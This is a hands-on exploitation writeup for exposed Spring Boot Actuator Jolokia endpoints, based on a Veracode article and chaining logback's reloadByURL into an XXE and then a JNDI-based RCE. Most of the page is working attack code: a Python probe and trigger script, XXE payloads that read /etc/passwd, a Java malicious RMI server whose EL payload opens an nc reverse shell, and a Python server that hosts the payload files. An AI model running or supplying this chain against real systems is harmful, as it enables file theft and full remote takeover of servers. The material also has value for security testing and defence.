
Spring Boot Actuator (jolokia) XXE/RCE

Information and payloads are taken from the following article: https://www.veracode.com/blog/research/exploiting-spring-boot-actuators

Edit 28/02/2020: another article reaches RCE through the H2 database instead of JNDI: "Remote Code Execution in Three Acts: Chaining Exposed Actuators and H2 Database Aliases in Spring Boot 2".

Tested on Spring Boot Actuator < 2.0.0 and Jolokia 1.6.0.

If you can reach /actuator/jolokia or /jolokia on an application that ships Spring Boot Actuator, and the JMX operation reloadByURL is exposed there (check the output of /jolokia/list, or /actuator/jolokia/list, for that operation), this writeup shows how to exploit an XXE and ultimately an RCE.

Set up the environment (the test bed from the Veracode article):

git clone https://github.com/artsploit/actuator-testbed
cd actuator-testbed
mvn install
mvn spring-boot:run

1. The jolokia XXE

If the reloadByURL operation exists, the logging configuration can be reloaded from an arbitrary URL. In Jolokia's GET protocol a '/' inside a path argument is written as '!/' (and '!' as '!!'), hence the escaped URL: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:1337!/logback.xml
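The check a practitioner wants before anything else is whether the endpoint actually lists reloadByURL, and the trigger URL has to follow Jolokia's own escaping rules. The following Python is an added example, not code from this repository or from the Veracode article: it scans a Jolokia /list response for MBeans that expose reloadByURL and builds the escaped exec URL. SAMPLE_LIST is a hand-constructed response that mirrors the shape of Jolokia 1.x's /list output; probe() and trigger_reload() need a live target and are the only parts that touch the network.

```python
# Added example (not part of the original repo): find reloadByURL on a Jolokia
# endpoint and build the escaped exec URL that triggers it.
import json
import urllib.error
import urllib.request

# MBean name under which logback registers its JMXConfigurator (as used in the writeup)
JMX_CONFIGURATOR = ("ch.qos.logback.classic:"
                    "Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator")

# Constructed sample of a Jolokia /list reply: one logback MBean exposing reloadByURL,
# one unrelated MBean. Real replies also carry "timestamp" and per-MBean "desc" fields.
SAMPLE_LIST = {
    "status": 200,
    "value": {
        "ch.qos.logback.classic": {
            "Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator": {
                "op": {
                    "reloadByURL": {"args": [{"name": "p1", "type": "java.net.URL", "desc": ""}],
                                    "ret": "void", "desc": "Operation exposed for management"},
                    "reloadDefaultConfiguration": {"args": [], "ret": "void", "desc": ""},
                },
                "attr": {"LoggerList": {"type": "java.util.List", "desc": "", "rw": False}},
            }
        },
        "java.lang": {"type=Memory": {"op": {"gc": {"args": [], "ret": "void", "desc": ""}}, "attr": {}}},
    },
}


def jolokia_escape(arg: str) -> str:
    """Escape one path argument for Jolokia's GET protocol.

    '!' is Jolokia's escape character: '!' becomes '!!' and '/' becomes '!/'. This is
    how a URL survives as a single path segment without relying on %2F, which many
    servlet containers reject outright.
    """
    return arg.replace("!", "!!").replace("/", "!/")


def build_reload_url(jolokia_base: str, config_url: str, mbean: str = JMX_CONFIGURATOR) -> str:
    """exec URL that makes logback reload its configuration from config_url."""
    return f"{jolokia_base.rstrip('/')}/exec/{mbean}/reloadByURL/{jolokia_escape(config_url)}"


def find_reload_by_url(list_response: dict) -> list:
    """Return the 'domain:properties' names of MBeans whose operations include reloadByURL."""
    hits = []
    for domain, mbeans in list_response.get("value", {}).items():
        for props, info in mbeans.items():
            # "op" maps operation name -> signature (a dict, or a list when overloaded)
            if "reloadByURL" in info.get("op", {}):
                hits.append(f"{domain}:{props}")
    return hits


def probe(jolokia_base: str) -> list:
    """GET /list on a live endpoint and report the MBeans exposing reloadByURL."""
    with urllib.request.urlopen(f"{jolokia_base.rstrip('/')}/list", timeout=10) as resp:
        return find_reload_by_url(json.load(resp))


def trigger_reload(jolokia_base: str, config_url: str) -> dict:
    """Call reloadByURL and return Jolokia's JSON reply.

    For the XXE stage the leaked file ends up in the 'error' field of the reply;
    for the JNDI stage a clean reload returns status 200 and the shell arrives on
    the listener, not here.
    """
    url = build_reload_url(jolokia_base, config_url)
    try:
        with urllib.request.urlopen(url, timeout=30) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as err:
        return json.load(err)  # Jolokia puts its error JSON in the body


if __name__ == "__main__":
    print("sample hits:", find_reload_by_url(SAMPLE_LIST))
    print(build_reload_url("http://localhost:8090/jolokia", "http://127.0.0.1:1337/logback.xml"))
```

Run probe("http://localhost:8090/jolokia") against the test bed (or with /actuator/jolokia on Spring Boot 2.x paths) to confirm the operation is there before serving any payload; the returned MBean name can be passed to build_reload_url if it differs from the default.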

Logback parses the configuration with a SAXParser that resolves external entities, so the reload can be turned into an out-of-band, error-based XXE with the following payload:

# file logback.xml from the server 127.0.0.1:1337
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE a [ <!ENTITY % remote SYSTEM "http://127.0.0.1:8080/file.dtd">%remote;%int;]>
<a>&trick;</a>
# file file.dtd from the server 127.0.0.1:8080
<!ENTITY % d SYSTEM "file:///etc/passwd"> 
<!ENTITY % int "<!ENTITY trick SYSTEM ':%d;'>">

The server responds with an error, and the contents of /etc/passwd are echoed inside it: the system identifier of the trick entity (':' followed by the file) is not a valid URL, so the parser fails and its error message carries the leaked data.

2. Jolokia RCE

Exploiting an XXE is always nice, but an RCE is better. Instead of serving a bogus XML we can serve a legitimate logback configuration file and abuse a feature of the format itself:

  1. We ask Jolokia to load a new logging configuration file from an external URL
  2. The logging config contains an insertFromJNDI element pointing at a malicious RMI server
  3. The malicious RMI server returns a JNDI Reference that the target resolves with Tomcat's BeanFactory, which evaluates an attacker-supplied EL expression and executes code on the target

The primitive behind this is JNDI: InitialContext.lookup(String name) takes a single string, and when that string comes from an untrusted source the lookup can lead to remote code execution, classically through remote class loading from the codebase named by the returned Reference. Background on JNDI injection:

https://www.veracode.com/blog/research/exploiting-jndi-injections-java

Content of the logback.xml file:

<configuration>
  <insertFromJNDI env-entry-name="rmi://127.0.0.1:1097/jndi" as="appName" />
</configuration>

Since JDK 8u121 (for RMI) and 8u191 (for LDAP) the JVM no longer loads classes from a remote codebase named by a JNDI Reference (the com.sun.jndi.*.object.trustURLCodebase properties default to false), so on a JDK newer than 1.8.0_191 the RMI server cannot simply point at an attacker-hosted class. Instead the Reference names a factory class that already sits on the target's classpath, Tomcat's org.apache.naming.factory.BeanFactory, and abuses it to evaluate an EL expression through javax.el.ELProcessor, as described in https://www.veracode.com/blog/research/exploiting-jndi-injections-java. This only works when the target ships Tomcat's naming classes and an EL implementation, which an embedded-Tomcat Spring Boot web application does.

The next step is to create the malicious RMI service:

import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;

public class EvilRMIServer {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        // The registry keeps a non-daemon thread alive, so the JVM stays up after bind()
        Registry registry = LocateRegistry.createRegistry(1097);

        // Reference resolved on the target by org.apache.naming.factory.BeanFactory, a Tomcat
        // class already on the classpath of an embedded-Tomcat Spring Boot app. No remote
        // codebase is involved, so trustURLCodebase=false does not stop it. BeanFactory
        // instantiates javax.el.ELProcessor and then calls a setter for each RefAddr.
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,
                "org.apache.naming.factory.BeanFactory", null);
        // 'forceString' renames the setter for property 'x' from setX to eval, so the value
        // of 'x' is handed to ELProcessor.eval() (unsafe reflection, see BeanFactory.getObjectInstance)
        ref.add(new StringRefAddr("forceString", "x=eval"));
        // EL expression evaluated on the target: a reverse shell to 127.0.0.1:1234.
        // Point it at your own listener, and replace /bin/sh with cmd.exe for a Windows target.
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 1234 >/tmp/f']).start()\")"));

        // Bind the Reference under the name 'jndi' so that rmi://127.0.0.1:1097/jndi resolves to it
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
        registry.bind("jndi", referenceWrapper);
    }
}

pom.xml to compile this project (spring-boot-starter-web pulls in embedded Tomcat, which provides org.apache.naming.ResourceRef; build and run it with Java 8, since on JDK 9+ the internal com.sun.jndi.rmi.registry package is not exported and needs --add-exports jdk.naming.rmi/com.sun.jndi.rmi.registry=ALL-UNNAMED):

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.springframework</groupId>
    <artifactId>RMIServer</artifactId>
    <version>0.0.1</version>

    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.0.0.RELEASE</version>
    </parent>

    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
    </dependencies>

    <properties>
        <java.version>1.8</java.version>
    </properties>

</project>

Once the two malicious servers are up (the HTTP server on 127.0.0.1:1337 serving logback.xml and the RMI registry on port 1097) and a listener is waiting on port 1234 (for example nc -lvnp 1234), call reloadByURL:

http://127.0.0.1:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:1337!/logback.xml

The EL expression is evaluated inside the target JVM and the listener on port 1234 receives a reverse shell.
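Both stages of the writeup assume an attacker-side HTTP server: one hosting the XXE pair (the entity-laden logback.xml plus file.dtd) and one hosting the JNDI logback configuration. The following Python is an added example, not code from this repository: it generates the three files from parameters (attacker host and port, target file, JNDI name) and serves them from a single stdlib HTTP server, a simplification of the page's two separate ports. The paths /xxe.xml, /file.dtd and /jndi.xml are this example's own choice, and the RMI registry itself is still the Java EvilRMIServer above.

```python
# Added example (not part of the original repo): attacker-side server for the
# payload files used by the XXE stage and the JNDI/RCE stage.
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


def xxe_config_xml(dtd_url: str) -> str:
    """Stage 1: the config logback fetches first; it pulls an external parameter-entity DTD."""
    return (
        '<?xml version="1.0" encoding="utf-8" ?>\n'
        f'<!DOCTYPE a [ <!ENTITY % remote SYSTEM "{dtd_url}">%remote;%int;]>\n'
        '<a>&trick;</a>\n'
    )


def xxe_dtd(target_file: str) -> str:
    """Stage 2: DTD that reads target_file and wraps it in an invalid ':'-prefixed
    system identifier, so the parser error echoes the file contents back."""
    return (
        f'<!ENTITY % d SYSTEM "file://{target_file}">\n'
        '<!ENTITY % int "<!ENTITY trick SYSTEM \':%d;\'>">\n'
    )


def jndi_logback_xml(jndi_name: str) -> str:
    """RCE stage: a valid logback config whose insertFromJNDI performs the JNDI lookup."""
    return (
        '<configuration>\n'
        f'  <insertFromJNDI env-entry-name="{jndi_name}" as="appName" />\n'
        '</configuration>\n'
    )


class PayloadHandler(BaseHTTPRequestHandler):
    files = {}  # path -> body, filled in by serve_payloads()

    def do_GET(self):
        body = self.files.get(self.path)
        if body is None:
            self.send_error(404)
            return
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/xml")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, fmt, *args):
        # Seeing the target fetch /file.dtd confirms the XXE fired even before the reply arrives
        print("[payload server] " + fmt % args)


def serve_payloads(host="127.0.0.1", port=1337, target_file="/etc/passwd",
                   jndi_name="rmi://127.0.0.1:1097/jndi"):
    """Start the server in a daemon thread; returns (server, base_url).

    host must be an address the *target* can reach; port 0 picks a free port.
    """
    server = HTTPServer((host, port), PayloadHandler)
    base = f"http://{host}:{server.server_address[1]}"
    PayloadHandler.files = {
        "/xxe.xml": xxe_config_xml(f"{base}/file.dtd"),
        "/file.dtd": xxe_dtd(target_file),
        "/jndi.xml": jndi_logback_xml(jndi_name),
    }
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, base


def fetch(url: str) -> str:
    """Small client used to sanity-check the served files."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    _, base = serve_payloads()
    print(f"XXE stage: {base}/xxe.xml   JNDI stage: {base}/jndi.xml")
    threading.Event().wait()  # keep the main thread alive while the daemon thread serves
```

Feed {base}/xxe.xml to reloadByURL for the XXE stage and {base}/jndi.xml (with EvilRMIServer and the nc listener running) for the RCE stage; the server's log line for /file.dtd tells you the target resolved the external entity.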

Edit: another writeup on exploiting Jolokia: https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/
